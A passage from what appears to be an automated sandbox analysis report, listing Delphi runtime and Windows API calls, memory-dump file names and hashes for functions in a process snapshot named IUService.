                                                                                                                                              • Part of subcall function 5000A1E4: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A287
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A297
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BDF
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BEB
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016C06
                                                                                                                                              • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016C12
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$Stringx20$Asg$qqrr20Cat3$qqrr20StringStringt2$FromStr$qqriSysutils@$CharLen$qqrr20Move$qqrpxvpvi$Char$qqrr20Clr$qqrpvString$qqriStringbStringpbiStringpci
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2917779735-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D679
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D674
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D69C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6A1
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D71E), ref: 5002D6BE
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6ED
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6F2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$String$RaiseRecxiSysutils@Unicode$Except$qqrvException@$bctr$qqrp20Recpx14$AnsiAsg$qqrr20ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20FromInternalList$qqrvLoadMetaStr$qqrr20String$qqrp20Stringpx14Stringx20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 211832472-0
                                                                                                                                            • Opcode ID: d82c6879fd7e8bb308ec514bab1eca5c326ff1012e43fe8cdcdfe95a8be795b9
                                                                                                                                            • Instruction ID: baf3d6f3658cd3b0b0bf9b1fe87a80f42db4b7494a16350bdacbce027700de45
                                                                                                                                            • Opcode Fuzzy Hash: d82c6879fd7e8bb308ec514bab1eca5c326ff1012e43fe8cdcdfe95a8be795b9
                                                                                                                                            • Instruction Fuzzy Hash: 3E319530A05589AFEB10DFE8E995A9DB7F8EF54304F5081A7E904D7261DB709E05CB90
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1B9
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1BF
                                                                                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1D5
                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 5001C1E9
                                                                                                                                            • ImageDirectoryEntryToData.IMAGEHLP(?,00000000,0000000E,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000), ref: 5001C212
                                                                                                                                            • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,80000000), ref: 5001C21B
                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 5001C23D
                                                                                                                                            • CloseHandle.KERNEL32(?,?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000), ref: 5001C246
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002), ref: 5001C24F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandleSystem@@View$Char$qqrx20DataDirectoryEntryExit$qqrvFinallyImageMappingStringSystem@UnicodeUnmap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2267264102-0
                                                                                                                                            • Opcode ID: 57813ce33fd1e787f2ae7afc3594a276316039dc248eaabb460c0ce63afaddb7
                                                                                                                                            • Instruction ID: ed93af7bb64c484572da9e927bec8c4042e6e931a3020e493e924e2f8d9bdac0
                                                                                                                                            • Opcode Fuzzy Hash: 57813ce33fd1e787f2ae7afc3594a276316039dc248eaabb460c0ce63afaddb7
                                                                                                                                            • Instruction Fuzzy Hash: C321A1B0A443C47BFB10CAE4AC56FAEB7BCAB18700F500655F704FB1C1D6B5A9408795
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,00000000,?), ref: 5002DB70
                                                                                                                                              • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                                                              • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                                                              • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,00000000,?), ref: 5002DB75
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DB98
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DB9D
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DBC0
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DBC5
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,00000000,?), ref: 5002DBCC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DBF1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DBF6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$RaiseString$Except$qqrvException@$bctr$qqrp20Sysutils@$Recpx14Recxi$AfterArrayClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucLength$qqrvList$qqrvLoadMetaObjectString$qqrp20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 434768823-0
                                                                                                                                            • Opcode ID: 70035ba3cdc4d1b591e6ff713689efda533d35203e273b787accabacad4fdffb
                                                                                                                                            • Instruction ID: 10693105d4530467d70705bbd3336f9fa5ff1ffcd69f97b7e410178babc29af3
                                                                                                                                            • Opcode Fuzzy Hash: 70035ba3cdc4d1b591e6ff713689efda533d35203e273b787accabacad4fdffb
                                                                                                                                            • Instruction Fuzzy Hash: 8E219531E06685ABEB10DFD9FCD1BADB7B8AB54304F50816AF90497352CB715D058BA0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011A8B), ref: 50011A03
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,50011A8B), ref: 50011A08
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011A8B), ref: 50011A27
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50011A8B), ref: 50011A51
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50011A8B), ref: 50011A5B
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00000000,?,00000000,?,00000000,50011A8B), ref: 50011A67
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,00000100,00000000,?,00000000,?,00000000,50011A8B), ref: 50011A70
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@Unicode$System@@$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Error$qqrvInternalLastLocaleRaiseStringx20Sysutils@Thread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3094671988-0
                                                                                                                                            • Opcode ID: 61edf3dfb67e96cd3ce6b600e90b04d6ddfba1988f50e1faa7fba45ec40b8dee
                                                                                                                                            • Instruction ID: 64e016724a4648d9eccdf5b5c7b5b498823f636818398dbbc543729642361fab
                                                                                                                                            • Opcode Fuzzy Hash: 61edf3dfb67e96cd3ce6b600e90b04d6ddfba1988f50e1faa7fba45ec40b8dee
                                                                                                                                            • Instruction Fuzzy Hash: 01118770A01285AFEF05DFF9DC9199EBBF8EF49210B9446A6F940E3311D730AE40DA91
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011B5F), ref: 50011AD7
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,50011B5F), ref: 50011ADC
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011B5F), ref: 50011AFB
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50011B5F), ref: 50011B25
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50011B5F), ref: 50011B2F
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000200,00000000,?,00000000,?,00000000,50011B5F), ref: 50011B3B
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,00000200,00000000,?,00000000,?,00000000,50011B5F), ref: 50011B44
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@Unicode$System@@$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Error$qqrvInternalLastLocaleRaiseStringx20Sysutils@Thread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3094671988-0
                                                                                                                                            • Opcode ID: bb35b1ec3dee52f85de0abe14dd36a5b07772a894f879ccd0841f78612b6cb55
                                                                                                                                            • Instruction ID: aa116bdb757719b18d0b9449cf26451f3ca687c3b180189956f3d9f0d1195bcc
                                                                                                                                            • Opcode Fuzzy Hash: bb35b1ec3dee52f85de0abe14dd36a5b07772a894f879ccd0841f78612b6cb55
                                                                                                                                            • Instruction Fuzzy Hash: 64118470A05285AFEF04DFA9DDD299EB7F8EF59210B5442A6F900E3311E730AE40DA91
                                                                                                                                            APIs
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 50036286
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 5003629E
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362A5
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362B1
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362BF
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362D6
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362E1
                                                                                                                                            • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362F0
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 50036300
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$DelphiInterface$t17System@%$Interface%IntfSystem@@$Variants@$Clear$qqrr45$CastCopy$qqrr45CustomError$qqrxusxusInterface%x45Variant$FindInterface$qqrrx5_Object@TypeType$qqrxusrp27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3781657090-0
                                                                                                                                            • Opcode ID: c8c5d2b16f66d087c23e02335a348befe5977fe6b2bc143d03b60feb3e5f1714
                                                                                                                                            • Instruction ID: 34bdf9ec822abdc4dce8ecfe916eb70bc0954c188ba1b176e15556ef215147c4
                                                                                                                                            • Opcode Fuzzy Hash: c8c5d2b16f66d087c23e02335a348befe5977fe6b2bc143d03b60feb3e5f1714
                                                                                                                                            • Instruction Fuzzy Hash: 5411C2503098E14F9A03ABA8D6455EF62C18F56624F12C363F904CB61ACFA9CD4A83E2
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3B8
                                                                                                                                            • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3CA
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3CF
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3DE
                                                                                                                                            • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3F0
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3F5
                                                                                                                                            • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(00000000,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F407
                                                                                                                                              • Part of subcall function 5002F438: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002F450
                                                                                                                                              • Part of subcall function 5002F438: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F46F
                                                                                                                                              • Part of subcall function 5002F438: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002F4C9), ref: 5002F486
                                                                                                                                              • Part of subcall function 5002F438: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002F4C9), ref: 5002F49A
                                                                                                                                              • Part of subcall function 5002F438: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F4A6
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F40C
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$Unicode$System@@$Raise$ArrayError@$bctr$qqrlx20Except$qqrvLoadSafeString$qqrp20Varutils@$Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Error$qqrucException@$bctr$qqrx20Format$qqrx20List$qqrvMetaRecxiStringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2318074137-0
                                                                                                                                            • Opcode ID: 2fc197e72b512a73204bf5c851bd90a70b0a5406eff194070ecd408d08181925
                                                                                                                                            • Instruction ID: bc5804b8ea2ea52ee02b52fff60dedcdbde60d4b00371caa1661321ee3d8b552
                                                                                                                                            • Opcode Fuzzy Hash: 2fc197e72b512a73204bf5c851bd90a70b0a5406eff194070ecd408d08181925
                                                                                                                                            • Instruction Fuzzy Hash: F81108316021C25BE720EFA8FCA3A7FB3E9EB58240FA00276F504C3252C6B16D018761
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D446
                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D455
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D461
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D46A
                                                                                                                                            • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D474
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D485
